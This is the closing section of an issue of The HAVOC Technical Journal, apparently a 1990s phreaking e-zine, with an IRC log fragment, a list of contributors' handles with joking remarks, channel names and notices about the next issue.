<shoelace> heh <Keystroke> np <Keystroke> heheh [11:07] *** shoelace has quit IRC (gots ta go get mah liscense ta dr1v3... KEY$^@@$^# PRAY FOR ME WITH THE S. S. THING$#^#$^#$^ and tell Tcon about it$@^^$$%) _____________________________________________________________ ------------------------ ---------------------- -[HAVOC Bell Systems]- -[Acknowledgements]- ------------------------ ---------------------- ArcAngl : Just joined up Agrajag : Back from the dead btm : Elite darkcyde : #phreak old-schooler digipimp : Co-conspirator Digital_X : Nemesis (MIA?) dr1x : It's 420! disc0re : Thinks were on NBC ec|ipse : Hysterical b1tch Keystroke : Submissions Editor shamrock : paranoid b1tch KungFuFox : Helped Reform #phreak RBCP : Funniest man alive memor : Ueberleet French phreak shoelace : visited by the SS psych0 : Lame ass mofo WeatherM : anarchist REality : Owns Own3r darc : Left #phreak Scud-O : Laid off from Wal-Mart JP : the man with connections Redtyde : #phreak not so old-schooler tombin : phear da b1tch! theLURK3R : Incarerated antifire : NT security guru UnaBomber : Tired of IRC (MIA?) WaRsPrItE : #phreak WAY old-schooler FH : want scud to have ICQ ------------------- TMessiah : Likes PGP -[ Channels ]- Revelation: old schooler ------------------- Modify : Lives near Scud-O #phreak : Home Sweet Home |Banshee| : is a hick #sin : SIN Home mC : infected.com - nuff said! #hackphreak : cool channel silitoad : Did ya like thtj? Phrax : Cell guy _____________________________________________________________ Issue 14 is out September 1st! Send all articles for issue 13 to Keystroke at: keystroke@thepentagon.com Tune in next time, Same Bat Time, Same Bat Channel! ========================================================== = Is this copy of The HAVOC Technical Journal skunked? = = If this file doesn't read at 155344 bytes, it probably = = doesn't have a born on date! Get a fresh copy from our = = NEW site at: http://www.thtj.com = ========================================================== -[End of Communique]-